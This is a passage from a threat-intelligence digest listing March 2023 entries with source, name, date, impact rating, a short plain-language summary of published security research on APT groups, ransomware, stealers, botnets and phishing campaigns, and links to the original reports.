—
- Intel Source:
- Securelist
- Intel Name:
- A_New_APT_Discovered_in_the_Area_of_Russo_Ukrainian_Conflict
- Date of Scan:
- 2023-03-21
- Impact:
- LOW
- Summary:
- Securelist researchers have identified a new APT group but yet not found any direct links between the samples and data used in this campaign and any previously known actors. However, the campaign is still active, and the investigation continues.
—
- Intel Source:
- IBM Security Intelligence
- Intel Name:
- The_Analysis_of_FudModule_within_the_Lazarus
- Date of Scan:
- 2023-03-21
- Impact:
- LOW
- Summary:
- Researchers from IBM Security Intelligence have analyzed the FudModule within the Lazarus sample, as well as highlighted a strategy of using telemetry stream health as a mode of detecting malware designed to impair defenses through ETW tampering.
Source:
https://securityintelligence.com/posts/defensive-considerations-lazarus-fudmodule/
—
- Intel Source:
- WithSecure
- Intel Name:
- Hackers_From_China_and_Russia_using_SILKLOADER_Malware_to_Avoid_Detection
- Date of Scan:
- 2023-03-20
- Impact:
- LOW
- Summary:
- Researchers from WithSecure Labs have investigated and found an interesting Cobalt Strike beacon loader that leverages DLL side-loading, which they are tracking as SILKLOADER. By taking a closer look at the loader, it is identified several activity clusters leveraging this loader within the Russian as well as Chinese cybercriminal ecosystems.
Source:
https://labs.withsecure.com/content/dam/labs/docs/withsecure-silkloader.pdf
—
- Intel Source:
- Checkpoint
- Intel Name:
- In_depth_Analysis_of_DotRunpeX_Injector
- Date of Scan:
- 2023-03-20
- Impact:
- LOW
- Summary:
- Researchers from Checkpoint have analyzed the dotRunpeX injector and its relation to the older version and the Investigation shows that dotRunpeX is used in the wild to deliver numerous known malware families.
—
- Intel Source:
- Uptycs
- Intel Name:
- A_New_InfoStealer_Named_HookSpoofer
- Date of Scan:
- 2023-03-20
- Impact:
- LOW
- Summary:
- Uptycs researchers have discovered a new Infostealer with keylogging and clipper capabilities named HookSpoofer spreading by multiple bundlers. A bundler is a collection of two or more files combined together in a single package.
Source:
https://www.uptycs.com/blog/threat-research-hookspoofer
—
- Intel Source:
- Akamai
- Intel Name:
- Diving_Deep_into_Go_Based_Threat
- Date of Scan:
- 2023-03-20
- Impact:
- LOW
- Summary:
- Researchers from Akamai have discovered a new botnet named HinataBot at the start of the year, they caught it on their HTTP and SSH honeypots and saw exploiting old flaws such as CVE-2014-8361 and CVE-2017-17215.
Source:
https://www.akamai.com/blog/security-research/hinatabot-uncovering-new-golang-ddos-botnet
—
- Intel Source:
- Redacted
- Intel Name:
- BIanLian_Ransomware_Gang_Turns_to_Data_Extortion
- Date of Scan:
- 2023-03-20
- Impact:
- LOW
- Summary:
- Redacted researchers have identified the BianLian ransomware group has shifted its focus from encrypting its victims’ files to only exfiltrating data found on compromised networks and using them for extortion.
Source:
https://redacted.com/blog/bianlian-ransomware-gang-continues-to-evolve/
—
- Intel Source:
- Mandiant
- Intel Name:
- Chinese_Hackers_Suspected_of_Launching_Fortinet_Zero_day_Attacks
- Date of Scan:
- 2023-03-20
- Impact:
- MEDIUM
- Summary:
- Mandiant researchers have discovered that a suspected Chinese hacking group has been linked to a series of attacks on government organizations exploiting a Fortinet zero-day vulnerability (CVE-2022-41328) to deploy malware.
Source:
https://www.mandiant.com/resources/blog/fortinet-malware-ecosystem
—
- Intel Source:
- Sentinelone
- Intel Name:
- The_Investigation_of_Winter_Vivern_APT_Activity
- Date of Scan:
- 2023-03-18
- Impact:
- LOW
- Summary:
- SentinelOne researchers have analyzed Winter Vivern Advanced Persistent Threat (APT) activity, leveraging observations made by The Polish CBZC and Ukraine CERT and uncovered a previously unknown set of espionage campaigns and targeting activities conducted by this threat actor.
Source:
https://www.sentinelone.com/labs/winter-vivern-uncovering-a-wave-of-global-espionage/
—
- Intel Source:
- G Data Blog
- Intel Name:
- ChatGPT_Rising_Activities_in_Cybercrime_World
- Date of Scan:
- 2023-03-18
- Impact:
- MEDIUM
- Summary:
- Researchers from G DATA have observed that cyberthreat actors capitalize on prominent social events’ latest technology buzzwords to launch their attacks. And the curtain raiser for 2023 that made the headlines was the clamor and viral use of a very human-sounding, artificial technology chatbot named, ChatGPT.
Source:
https://www.gdatasoftware.com/blog/2023/03/37716-chatgpt-evil-twin
—
- Intel Source:
- Lab52
- Intel Name:
- APT_C_36_Linked_With_Campaigns
- Date of Scan:
- 2023-03-18
- Impact:
- LOW
- Summary:
- Researchers from Lab52 have observed the APT-C-36 group has many similarities in terms of tactics, techniques, and procedures (TTPs) with the group Hagga / Aggah.
Source:
https://lab52.io/blog/apt-c-36-from-njrat-to-apt-c-36/
—
- Intel Source:
- Sophos
- Intel Name:
- The_Popularity_of_ProxyNotShell_Continues_to_Grow
- Date of Scan:
- 2023-03-18
- Impact:
- LOW
- Summary:
- Researchers from Sophos have observed that ProxyNotShell vulnerability continues to make waves as November 2022 fixes fail to contain the SSRF tactic.
Source:
https://news.sophos.com/en-us/2023/03/15/observing-owassrf-exchange-exploitation-still/
—
- Intel Source:
- Talos
- Intel Name:
- Hackers_From_YoroTrooper_Group_Targeting_CIS_Energy_Orgs_and_EU_Embassies
- Date of Scan:
- 2023-03-17
- Impact:
- MEDIUM
- Summary:
- Cisco Talos researchers have identified a new threat actor named ‘YoroTrooper’ has been running cyber-espionage campaigns since at least June 2022, targeting government and energy organizations in Commonwealth of Independent States (CIS) countries.
Source:
https://blog.talosintelligence.com/yorotrooper-espionage-campaign-cis-turkey-europe/
—
- Intel Source:
- Cyble
- Intel Name:
- Hackers_Exploiting_SVB_Collapse_Scenario
- Date of Scan:
- 2023-03-16
- Impact:
- LOW
- Summary:
- Cyble researchers have identified several suspicious websites that have emerged in the wake of the Silicon Valley Bank (SVB) collapse.
Source:
https://blog.cyble.com/2023/03/14/svb-collapse-triggers-heightened-cybersecurity-concerns/
—
- Intel Source:
- Blackberry
- Intel Name:
- Russian_Threat_Group_NOBELIUM_Targeting_Western_Countries
- Date of Scan:
- 2023-03-16
- Impact:
- MEDIUM
- Summary:
- Researchers from Blackberry have observed a new campaign targeting European Union countries, specifically, its diplomatic entities and systems transmitting sensitive information about the region’s politics, aiding Ukrainian citizens fleeing the country, and providing help to the government of Ukraine.
Source:
https://blogs.blackberry.com/en/2023/03/nobelium-targets-eu-governments-assisting-ukraine
—
- Intel Source:
- Google Blog
- Intel Name:
- Microsoft_SmartScreen_Bypassed_by_Magniber_Ransomware_Actors
- Date of Scan:
- 2023-03-16
- Impact:
- LOW
- Summary:
- Researchers from Google threat analysis group have discovered the usage of an unpatched security bypass in Microsoft’s SmartScreen security feature, which financially motivated actors are using to deliver the Magniber ransomware without any security warnings. The attackers are delivering MSI files signed with an invalid but specially crafted Authenticode signature.
—
- Intel Source:
- ASEC
- Intel Name:
- Mallox_Ransomware_Distributing_in_Korea
- Date of Scan:
- 2023-03-16
- Impact:
- LOW
- Summary:
- ASEC researchers have discovered the distribution of the Mallox ransomware which targets vulnerable MS-SQL servers.
—
- Intel Source:
- Fortinet
- Intel Name:
- The_Examination_of_FG_IR_22_369
- Date of Scan:
- 2023-03-16
- Impact:
- HIGH
- Summary:
- FortiGate researchers have identified that government entities and large organizations are targeted by an unknown threat actor by exploiting a security flaw in Fortinet FortiOS software to result in data loss and OS and file corruption.
Source:
https://www.fortinet.com/blog/psirt-blogs/fg-ir-22-369-psirt-analysis
—
- Intel Source:
- Sentinelone
- Intel Name:
- Diving_Deep_into_CatB_Ransomware
- Date of Scan:
- 2023-03-16
- Impact:
- LOW
- Summary:
- SentinelOne researchers have analyzed the CatB ransomware and its abuse of the legitimate MSDTC service, describing its evasion tactics, encryption behavior, and its attempts to steal credentials and browser data.
Source:
https://www.sentinelone.com/blog/decrypting-catb-ransomware-analyzing-their-latest-attack-methods/
—
- Intel Source:
- CISA
- Intel Name:
- Telerik_Vulnerability_in_US_Government_IIS_Server
- Date of Scan:
- 2023-03-16
- Impact:
- MEDIUM
- Summary:
- The CISA, FBI, and MS-ISAC released a joint Cybersecurity Advisory. This joint CSA provides IT infrastructure defenders with TTPs, IOCs, and detection, protection methods against similar, successful CVE-2019-18935 exploitation.
—
- Intel Source:
- Cyble
- Intel Name:
- The_MedusaLocker_Ransomware_is_Revealed
- Date of Scan:
- 2023-03-16
- Impact:
- LOW
- Summary:
- Researchers from Cyble have unmasked the MedusaLocker ransomware. It’s known to target Hospital and Healthcare industries, but additionally, the gang also targets industries such as Education and Government organizations.
Source:
https://blog.cyble.com/2023/03/15/unmasking-medusalocker-ransomware/
—
- Intel Source:
- Welivesecurity
- Intel Name:
- APT_Group_Tick_Targeting_Data_Loss_Prevention_Company
- Date of Scan:
- 2023-03-16
- Impact:
- MEDIUM
- Summary:
- ESET researchers have discovered a campaign by APT group Tick. The attackers compromising the DLP company’s internal update servers to deliver malware inside the software developer’s network, and trojanizing installers of legitimate tools using by the company, which eventually result in the execution of malware on the computers of the company’s customers.
—
- Intel Source:
- Microsoft
- Intel Name:
- Large_Scale_Phishing_Campaigns_are_Powered_by_DEV_1101_AiTM_Phishing_Kit
- Date of Scan:
- 2023-03-16
- Impact:
- MEDIUM
- Summary:
- Researchers from Microsoft have identified an open-source adversary-in-the-middle (AiTM) phishing kit that has found a number of takers in the cybercrime world for its ability to orchestrate attacks at scale. It is tracking the threat actor behind the development of the kit under its emerging moniker DEV-1101.
—
- Intel Source:
- Juniper
- Intel Name:
- A_Look_at_Dark_Side_of_Email_Traffic
- Date of Scan:
- 2023-03-16
- Impact:
- LOW
- Summary:
- Researchers from Juniper have analyzed the dark side of email traffic, uncovering some of the latest malware threats, tactics, and trends that can potentially undermine the systems.
Source:
https://blogs.juniper.net/en-us/threat-research/uncovering-the-dark-side-of-email-traffic
—
- Intel Source:
- ASEC
- Intel Name:
- A_CHM_malware_by_the_Kimsuky_group
- Date of Scan:
- 2023-03-15
- Impact:
- LOW
- Summary:
- ASEC has discovered a new CHM malware created by the Kimsuky group. This malware type is the same that the reserqachers mnetioned earlier in their posts on the malware distributed by the Kimsuky group, its goal being the exfiltration of user information.
—
- Intel Source:
- Mandiant
- Intel Name:
- North_Korea_s_UNC2970_TTPs_Part_1_and_2
- Date of Scan:
- 2023-03-15
- Impact:
- MEDIUM
- Summary:
- During our investigation, Mandiant researchers discovered most of the original compromised hosts, targeted by UNC2970. Mandiant Managed Defense discovered as well that this group is targeting a U.S.-based technology company
Source:
https://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970
https://www.mandiant.com/resources/blog/lightshift-and-lightshow
—
- Intel Source:
- Netscope
- Intel Name:
- Increasingly_Abusing_of_DigitalOcean_by_attackers
- Date of Scan:
- 2023-03-15
- Impact:
- LOW
- Summary:
- Netskope Threat Labs observed increased traffic in malicious web pages hosted on DigitalOcean in the last couple months. This new campaigns scam mimics Windows Defender and tries to deceive users into believing that their computer is infected. The purpose of this scam is to involve victims into a scam “help line”. The attackers try to involve the remotely access of the victim’s computer to either install malware or request payment to infect the victims.
Source:
https://www.netskope.com/blog/attackers-increasingly-abusing-digitalocean-to-host-scams-and-phishing
—
- Intel Source:
- MetaBase Q
- Intel Name:
- The_new_ATM_Malware_FiXS
- Date of Scan:
- 2023-03-14
- Impact:
- LOW
- Summary:
- FiXs is a new ATM malware that steals data from ATMs and infects computers. Metabase Q has been tracking and monitoring the rise of ATM malware that takes advantage of physical and digital components of the ATM.
—
- Intel Source:
- Cofense
- Intel Name:
- Emotet_resumes_sending_malicious_emails
- Date of Scan:
- 2023-03-14
- Impact:
- LOW
- Summary:
- Researchers from Confense have discovered that after several months of inactivity, the Emotet botnet resumed email activity this morning at 8:00am EST. The malicious emails seem to be replying to already existing email chains, with the addition of an attached .zip file. The .zip files are not password protected. The themes of the attached files include finances and invoices.
Source:
https://cofense.com/blog/emotet-sending-malicious-emails-after-three-month-hiatus/
—
- Intel Source:
- Talos
- Intel Name:
- New_capabilities_of_Prometei_botnet
- Date of Scan:
- 2023-03-14
- Impact:
- MEDIUM
- Summary:
- Researchers from Talos have observed Prometei with the updated infrastructure components and capabilities. The botnet operators updated certain submodules of the execution chain to automate processes and challenge forensic analysis methods. The threat actors are trying actively spreading improved Linux versions of the Prometei bot, v3. Also researchers have observed a new functionality, which includes an additional C2 domain generating algorithm (DGA), a self-updating mechanism, and a bundled version of the Apache Webserver with a web shell. This bot is possible influenced by the war in Ukraine.
Source:
https://blog.talosintelligence.com/prometei-botnet-improves/
—
- Intel Source:
- PaloAlto
- Intel Name:
- New_GoBruteforcer_Malware_Targeting_phpMyAdmin_MySQL_FTP_and_Postgres
- Date of Scan:
- 2023-03-13
- Impact:
- MEDIUM
- Summary:
- PaloAlto researchers have identified a newly discovered Golang-based botnet malware scan for and infect web servers running phpMyAdmin, MySQL, FTP, and Postgres services.
Source:
https://unit42.paloaltonetworks.com/gobruteforcer-golang-botnet/?web_view=true
—
- Intel Source:
- Mandiant
- Intel Name:
- Chinese_Hacker_Running_Malware_on_Unpatched_SMA
- Date of Scan:
- 2023-03-13
- Impact:
- LOW
- Summary:
- Mandiant researchers have identified a suspected Chinese campaign that involves maintaining long-term persistence by running malware on an unpatched SonicWall Secure Mobile Access (SMA) appliance. The malware has the functionality to steal user credentials, provide shell access, and persist through firmware upgrades. Currently tracks this actor as UNC4540.
Source:
https://www.mandiant.com/resources/blog/suspected-chinese-persist-sonicwall
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Overview_of_a_Mirai_Payload_Generator
- Date of Scan:
- 2023-03-13
- Impact:
- LOW
- Summary:
- Researchers from SANS have observed that still honeypot is hit by hundreds of Mirai requests every day. Upon analysis, they found a Python script that generates a Mirai payload and deploys networking services to serve it via FTP, HTTP, and TFTP.
Source:
https://isc.sans.edu/diary/Overview+of+a+Mirai+Payload+Generator/29624/
—
- Intel Source:
- ASEC
- Intel Name:
- Netcat_Malware_Targeting_MS_SQL_Servers
- Date of Scan:
- 2023-03-13
- Impact:
- LOW
- Summary:
- Researchers from ASEC have discovered the distribution of the Netcat malware targeting poorly managed MS-SQL servers. Netcat is a utility that allows users to send and receive data from specific destinations on a network connected by the TCP/UDP protocol.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- AsynRAT_Trojan_Distributing_via_Bill_Payment_Email
- Date of Scan:
- 2023-03-13
- Impact:
- LOW
- Summary:
- Researchers from SANS have observed the mail server quarantined this file FautraPago392023.gz. After executing (gunzip) the file, there was no .exe extension associated with this file. The source and destination addresses are both blank without an actual email address.
Source:
https://isc.sans.edu/diary/AsynRAT+Trojan+Bill+Payment+Pago+de+la+factura/29626/
—
- Intel Source:
- Cofense
- Intel Name:
- New_Phishing_Scam_Using_Fake_SBA_Grants
- Date of Scan:
- 2023-03-13
- Impact:
- LOW
- Summary:
- Researchers from Cofense have observed that a phishing campaign attempting to impersonate the US Small Business Administration (SBA), offering these grants in the hopes someone unfortunate will provide their credentials.
Source:
https://cofense.com/blog/fake-small-business-administration-sba-grant-used-in-new-phishing-scam/
—
- Intel Source:
- Esentire
- Intel Name:
- BATLOADER_Malware_Leveraging_Google_Ads
- Date of Scan:
- 2023-03-13
- Impact:
- MEDIUM
- Summary:
- Esentire researchers have discovered the malware downloader known as BATLOADER that is abusing Google Ads to deliver secondary payloads like Vidar Stealer and Ursnif. The malicious ads are used to spoof a wide range of legitimate apps and services such as Adobe, OpenAPI’s ChatGPT, Spotify, Tableau, and Zoom.
—
- Intel Source:
- Cyble
- Intel Name:
- Chaos_Ransomware_Shadow_is_Cast_by_BlackSnake_Ransomware
- Date of Scan:
- 2023-03-11
- Impact:
- LOW
- Summary:
- Cyble Labs researchers have discovered a ransomware variant that not only encrypts victims’ files but also steals their Discord tokens.
Source:
https://blog.cyble.com/2023/03/09/blacksnake-ransomware-emerges-from-chaos-ransomwares-shadow/
—
- Intel Source:
- ASEC
- Intel Name:
- PlugX_Malware_Exploits_Remote_Desktop_Software_Flaws
- Date of Scan:
- 2023-03-11
- Impact:
- MEDIUM
- Summary:
- Researchers from ASEC have discovered security vulnerabilities in remote desktop programs such as Sunlogin and AweSun are being exploited by threat actors to deploy the PlugX malware.
—
- Intel Source:
- Securelist
- Intel Name:
- The_Use_of_Search_Engines_For_Malvertising
- Date of Scan:
- 2023-03-10
- Impact:
- LOW
- Summary:
- Researchers from Securelist have observed an increase in the number of malicious campaigns that use Google Advertising as a means of distributing and delivering malware. At least two different stealers, Rhadamanthys and RedLine, are abusing the search engine promotion plan in order to deliver malicious payloads to victims’ machines.
Source:
https://securelist.com/malvertising-through-search-engines/108996/
—
- Intel Source:
- Fortinet
- Intel Name:
- New_ScrubCrypt_Crypter_Targeting_Oracle_WebLogic
- Date of Scan:
- 2023-03-10
- Impact:
- MEDIUM
- Summary:
- Fortinet Lab researchers have observed the attack chain commences with the successful exploitation of susceptible Oracle WebLogic servers to download a PowerShell script that contains ScrubCrypt.
Source:
https://www.fortinet.com/blog/threat-research/old-cyber-gang-uses-new-crypter-scrubcrypt
—
- Intel Source:
- Sentinelone
- Intel Name:
- IceFire_Ransomware_Exploiting_IBM_Aspera_Faspex
- Date of Scan:
- 2023-03-10
- Impact:
- MEDIUM
- Summary:
- SentinelOne researchers have identified a Windows-based ransomware strain known as IceFire has expanded its focus to target Linux enterprise networks belonging to several media and entertainment sector organizations across the world.
Source:
https://www.sentinelone.com/labs/icefire-ransomware-returns-now-targeting-linux-enterprise-networks/
—
- Intel Source:
- Trustwave
- Intel Name:
- OneNote_Misused_by_Cybercriminals
- Date of Scan:
- 2023-03-09
- Impact:
- LOW
- Summary:
- Researchers from Trustwave have analyzed the activity of cybercriminals as to how they are abusing OneNote.
—
- Intel Source:
- Cofense
- Intel Name:
- Increasing_Phishing_Campaigns_During_Tax_Season
- Date of Scan:
- 2023-03-09
- Impact:
- LOW
- Summary:
- Researchers from Cofense have identified threat actors attempting to use tax season to target recipients with a potential refund and using the Adobe filesharing service to deliver the phishing.
Source:
https://cofense.com/blog/tax-season-phishing-campaigns-are-ramping-up/
—
- Intel Source:
- ZScaler
- Intel Name:
- Analysis_of_Nevada_Ransomware_and_Compares_With_Nokoyawa_Ransomware
- Date of Scan:
- 2023-03-09
- Impact:
- LOW
- Summary:
- Zscaler ThreatLab have identified the significant code similarities between Nevada and Nokoyawa ransomware including debug strings, command-line arguments, and encryption algorithms.
Source:
https://www.zscaler.com/blogs/security-research/nevada-ransomware-yet-another-nokayawa-variant
—
- Intel Source:
- Volexity
- Intel Name:
- Analysis_of_Memory_For_Detecting_EDR_Nullifying_Malware
- Date of Scan:
- 2023-03-09
- Impact:
- LOW
- Summary:
- Volexity researchers have examined the technique of attacking endpoint detection and response (EDR) and antivirus (AV) software could reliably be detected through memory analysis.
Source:
https://www.volexity.com/blog/2023/03/07/using-memory-analysis-to-detect-edr-nullifying-malware/
—
- Intel Source:
- Trellix
- Intel Name:
- Qakbot_evolves_to_OneNote_Malware_Distribution
- Date of Scan:
- 2023-03-08
- Impact:
- MEDIUM
- Summary:
- Researchers from Trellix have discovered Qakbot (aka QBot, QuakBot, and Pinkslipbot) is a sophisticated piece of malware, there has been an upsurge in the number of Qakbot campaigns using a novel delivery technique: OneNote documents for malware distribution
—
- Intel Source:
- ASEC
- Intel Name:
- GlobeImposter_Ransomware_Installed_Using_RDP
- Date of Scan:
- 2023-03-08
- Impact:
- LOW
- Summary:
- ASEC has recently discovered the active distribution of the GlobeImposter ransomware. This attack is being carried out by the threat actors behind MedusaLocker.
—
- Intel Source:
- Checkpoint
- Intel Name:
- Chinese_Cyber_Attack_Against_Southeast_Asian_Government_Entities
- Date of Scan:
- 2023-03-08
- Impact:
- HIGH
- Summary:
- Researchers from Checkpoint have analyzed the TTPs and the tools used in the espionage campaign against Southeast Asian government entities. The initial infection stages of this campaign use TTPs and tools consistent with Sharp Panda activity.
—
- Intel Source:
- Cyware
- Intel Name:
- PyPI_package_delivers_malicious_Colour_Blind_RAT
- Date of Scan:
- 2023-03-08
- Impact:
- LOW
- Summary:
- Researchers from cyware have identified a malicious PyPI package that delivers a fully-featured information stealer and remote access trojan dubbed Colour-Blind.
Source:
https://cyware.com/news/malicious-pypi-package-delivers-colour-blind-rat-1c24f4e6/?web_view=true
—
- Intel Source:
- Fortinet
- Intel Name:
- In_Depth_Analysis_of_Sirattacker_and_ALC_Ransomware
- Date of Scan:
- 2023-03-08
- Impact:
- MEDIUM
- Summary:
- FortiGate Lab researchers have gathered data on ransomware variants of interest that have been gaining traction within their datasets and the OSINT community. They analyzed the Sirattacker and ALC ransomware which is targeting Microsoft Windows users.
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-sirattacker-acl?&web_view=true
—
- Intel Source:
- Bitdefender
- Intel Name:
- Phishing_Campaign_Using_Copycat_ChatGPT_Platform
- Date of Scan:
- 2023-03-07
- Impact:
- MEDIUM
- Summary:
- Researchers from BitDefender Labs have identified the success of the viral AI tool has also attracted the attention of fraudsters who use the technology to conduct highly sophisticated investment scams against unwary internet users.
—
- Intel Source:
- PRODAFT
- Intel Name:
- In_Depth_Analysis_of_RIG_Exploit_Kit
- Date of Scan:
- 2023-03-07
- Impact:
- LOW
- Summary:
- Researchers from Prodaft have analyzed the RIG Exploit Kit. It is malware being operated as a MaaS subscription model and is enjoying the most glorious duration of its lifetime in terms of successful attacks.
Source:
https://www.prodaft.com/resource/detail/rig-rig-exploit-kit-depth-analysis
—
- Intel Source:
- PaloAlto
- Intel Name:
- LokiBot_Distributing_via_Phishing_Emails
- Date of Scan:
- 2023-03-07
- Impact:
- LOW
- Summary:
- PaloAlto researchers have uncovered a malware distribution campaign that is delivering the LokiBot information stealer via business email compromise (BEC) phishing emails. This malware is designed to steal sensitive information from victims’ systems, such as passwords and banking information, as well as other sensitive data.
Source:
https://unit42.paloaltonetworks.com/lokibot-spike-analysis/
—
- Intel Source:
- Lumen
- Intel Name:
- New_HiatusRAT_Malware_Targeting_Business_Grade_Routers
- Date of Scan:
- 2023-03-07
- Impact:
- MEDIUM
- Summary:
- Lumen researchers have observed malware that is targeting business-grade routers to covertly spy on victims in Latin America, Europe, and North America at least since July 2022.
Source:
https://blog.lumen.com/new-hiatusrat-router-malware-covertly-spies-on-victims/
—
- Intel Source:
- ASEC
- Intel Name:
- The_Analysis_of_Lazarus_Group
- Date of Scan:
- 2023-03-07
- Impact:
- LOW
- Summary:
- ASEC researchers have identified that Lazarus group’s malware strains have been found in various Korean companies related to national defense, satellites, software, media press, etc. Hence, they pursued and analyzed the Lazarus threat group’s activities and related malware.
—
- Intel Source:
- Trellix
- Intel Name:
- Phishing_Campaign_Targeting_Job_Seekers_and_Employers
- Date of Scan:
- 2023-03-07
- Impact:
- LOW
- Summary:
- Researchers from Trellix have discovered threat actors are exploiting the ongoing economic downturn by using job-themed phishing and malware campaigns to target job seekers and employers to steal sensitive information and hack company recruiters.
—
- Intel Source:
- Nviso
- Intel Name:
- OneNote_Embedded_File_Abuse
- Date of Scan:
- 2023-03-07
- Impact:
- LOW
- Summary:
- Researchers from Nviso have observed the OneNote feature that is being abused during these phishing campaigns is hiding embedded files behind pictures which entices the user to click the picture. If the picture is clicked, it will execute the file hidden beneath.
Source:
https://blog.nviso.eu/2023/02/27/onenote-embedded-file-abuse/
—
- Intel Source:
- Sysdig
- Intel Name:
- Hackers_From_SCARLETEEL_Using_Advanced_Cloud_Skills_to_Steal_Source_Code_and_Data
- Date of Scan:
- 2023-03-06
- Impact:
- MEDIUM
- Summary:
- Sysdig researchers have discovered a sophisticated cloud operation in a customer environment, dubbed SCARLETEEL, that resulted in stolen proprietary data. The attacker exploited a containerized workload and then leveraged it to perform privilege escalation into an AWS account in order to steal proprietary software and credentials.
Source:
https://sysdig.com/blog/cloud-breach-terraform-data-theft/
—
- Intel Source:
- Cyble
- Intel Name:
- LockBit_Ransomware_Attack_on_Indian_Companies
- Date of Scan:
- 2023-03-06
- Impact:
- LOW
- Summary:
- Cyble researchers have observed the LockBit ransomware group that claimed to have compromised the networks of an Indian investment company, Infrastructure Leasing & Financial Services Limited (IL&FS), on February 28, 2023.
Source:
https://blog.cyble.com/2023/03/01/ransomware-attack-on-ilfs/
—
- Intel Source:
- CISA
- Intel Name:
- The_New_TTPs_of_Royal_ransomware
- Date of Scan:
- 2023-03-06
- Impact:
- MEDIUM
- Summary:
- The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) released the joint CSA to disseminate known Royal ransomware IOCs and TTPs identified through FBI threat response activities as recently as January 2023.
Source:
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-061a
—
- Intel Source:
- TrendMicro
- Intel Name:
- Spear_Phishing_Campaign_Targeting_Hospitality_Industry_Using_RedLine_Stealer
- Date of Scan:
- 2023-03-06
- Impact:
- LOW
- Summary:
- Researchers from TrendMicro have identified RedLine Stealer’s evasive spear-phishing campaign that targeting the hospitality industry.
—
- Intel Source:
- Cyble
- Intel Name:
- WhiteSnake_Stealer_Targeting_Windows_and_Linux_Users
- Date of Scan:
- 2023-03-06
- Impact:
- LOW
- Summary:
- Cyble researchers have discovered a new malware strain called “WhiteSnake” Stealer. This stealer is available in versions designed for both Windows and Linux. It is capable of gathering a range of sensitive information, including passwords, cookies, credit card numbers, screenshots, and other personal or financial data.
Source:
https://blog.cyble.com/2023/02/24/new-whitesnake-stealer-offered-for-sale-via-maas-model/
—
- Intel Source:
- Malwarebytes
- Intel Name:
- RIG_Exploit_Kit_Targeting_Internet_Explorer_Users
- Date of Scan:
- 2023-03-06
- Impact:
- LOW
- Summary:
- Malwarebytes researchers have identified that Internet Explorer (IE) is still being exploited by exploit kits like the RIG exploit kit (EK).
—
- Intel Source:
- Fortinet
- Intel Name:
- MyDoom_Worm_Distributing_via_Phishing_Email
- Date of Scan:
- 2023-03-06
- Impact:
- LOW
- Summary:
- Researchers from Fortinet have identified a phishing campaign using the MyDoom worm. It was first discovered back in 2004 and it has seen some updates and modifications since its introduction.
—
- Intel Source:
- ZScaler
- Intel Name:
- OneNote_Documents_Distributing_Malware
- Date of Scan:
- 2023-03-06
- Impact:
- LOW
- Summary:
- Zscaler researchers have observed threat actors are increasingly using Microsoft OneNote documents to deliver malware via phishing emails.
Source:
https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution
—
- Intel Source:
- Welivesecurity
- Intel Name:
- Hackers_From_China_Using_Custom_Backdoor_to_Evade_Detection
- Date of Scan:
- 2023-03-06
- Impact:
- LOW
- Summary:
- Researchers from Welivesecurity have identified the Chinese cyber espionage hacking group Mustang Panda is deploying a new custom backdoor named ‘MQsTTang’ in attacks starting this year.
—
- Intel Source:
- Fortinet
- Intel Name:
- The_Deep_Investigation_of_LockBit_Ransomware_Campaign
- Date of Scan:
- 2023-03-04
- Impact:
- MEDIUM
- Summary:
- FortiGuard Labs researchers have observed a new LockBit ransomware campaign last December and January using a combination of techniques effective against AV and EDR solutions and analyzed the infection chain and Tactics, Techniques, and Procedures (TTPs) of this campaign.
Source:
https://www.fortinet.com/blog/threat-research/emerging-lockbit-campaign?&web_view=true
—
- Intel Source:
- Cyfirma
- Intel Name:
- The_Examination_of_EXFILTRATION_22
- Date of Scan:
- 2023-03-04
- Impact:
- LOW
- Summary:
- Researchers from Cyfirma have provided an analysis of a new post of exploitation framework called EXFILTRATOR-22 a.k.a. EX-22.
Source:
https://www.cyfirma.com/outofband/exfiltrator-22-an-emerging-post-exploitation-framework/
—
- Intel Source:
- Talos
- Intel Name:
- The_deployment_of_New_MortalKombat_Ransomware_and_Laplas_Clipper_Malware_threats
- Date of Scan:
- 2023-03-04
- Impact:
- MEDIUM
- Summary:
- Since last December, Cisco Talos team has has been observing a new actor who used 2 new threats MortalKombat ransomware and a GO variant of the Laplas Clipper malware, to steal cryptocurrency from victims. Also Talos researchers have seen the actor browsing the internet for victim machines with a malicious exposed remote desktop protocol (RDP) port 3389, using one of their download servers that run an RDP crawler and also download MortalKombat ransomware. After the reserachers analyzed something common in the code, class name, and registry key strings, they think that that the MortalKombat ransomware belongs to the Xorist family.
Source:
https://blog.talosintelligence.com/new-mortalkombat-ransomware-and-laplas-clipper-malware-threats/
—
- Intel Source:
- Welivesecurity
- Intel Name:
- BlackLotus_Malware_Capable_of_Bypassing_Secure_Boot
- Date of Scan:
- 2023-03-03
- Impact:
- MEDIUM
- Summary:
- Researchers from Welivesecurity have identified that a stealthy Unified Extensible Firmware Interface (UEFI) bootkit called BlackLotus has becomes the first UEFI bootkit malware to bypass secure boot on Windows 11.
Source:
https://www.welivesecurity.com/2023/03/01/blacklotus-uefi-bootkit-myth-confirmed/
—
- Intel Source:
- Blackberry
- Intel Name:
- Hackers_From_Blind_Eagle_Targeting_Organizations_in_Colombia_and_Ecuador
- Date of Scan:
- 2023-03-01
- Impact:
- LOW
- Summary:
- BlackBerry researchers have identified a new campaign where the threat actor impersonated a Colombian government tax agency to target key industries in Colombia, including health, financial, law enforcement, immigration, and an agency in charge of peace negotiation in the country.
Source:
https://blogs.blackberry.com/en/2023/02/blind-eagle-apt-c-36-targets-colombia
—
- Intel Source:
- TrendMicro
- Intel Name:
- Iron_Tiger_Group_Targeting_Linux_Through_SysUpdate
- Date of Scan:
- 2023-03-01
- Impact:
- MEDIUM
- Summary:
- Researchers from TrendMicro have identified that hackers from Iron Tiger updated SysUpdate, one of their custom malware families, to include new features and add malware infection support for the Linux platform.
Source:
https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html
—
- Intel Source:
- Proofpoint
- Intel Name:
- Diving_Deep_into_TA_69_and_its_SocGholish_Payload
- Date of Scan:
- 2023-03-01
- Impact:
- LOW
- Summary:
- Researchers from Proofpoint have observed changes in the tactics, techniques, and procedures (TTPs) employed by TA569. Changes include an increase in the number of injection varieties, as well as payloads deviating from the standard SocGholish “Fake Update” JavaScript packages.
Source:
https://www.proofpoint.com/us/blog/threat-insight/ta569-socgholish-and-beyond
—
- Intel Source:
- Inquest
- Intel Name:
